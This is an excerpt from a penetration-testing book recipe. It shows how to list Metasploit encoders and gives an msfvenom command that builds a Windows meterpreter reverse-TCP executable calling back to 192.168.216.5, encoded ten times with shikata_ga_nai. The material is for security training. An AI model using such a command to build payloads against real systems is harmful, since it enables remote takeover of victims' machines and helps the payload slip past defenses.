How to do it...

  1. By using MSFconsole with the show encoders option, or by browsing to the /usr/share/metasploit-framework/modules/encoders/ folder in our Kali Linux machine, we can see all the encoders available on the Metasploit Framework:
msf > show encoders
  1. To encode one of our previous payloads, we simple add the -e option, followed by the encoder we want to use, and, if we so choose, we can use the -i option, followed by the number of times to encode the payload:
msf > msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.216.5 -f exe -e x86/shikata_ga_nai -i 10 -o encoded.exe[*] exec: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.216.5 -f exe -e x86/shikata_ga_nai ...

Get Improving your Penetration Testing Skills now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.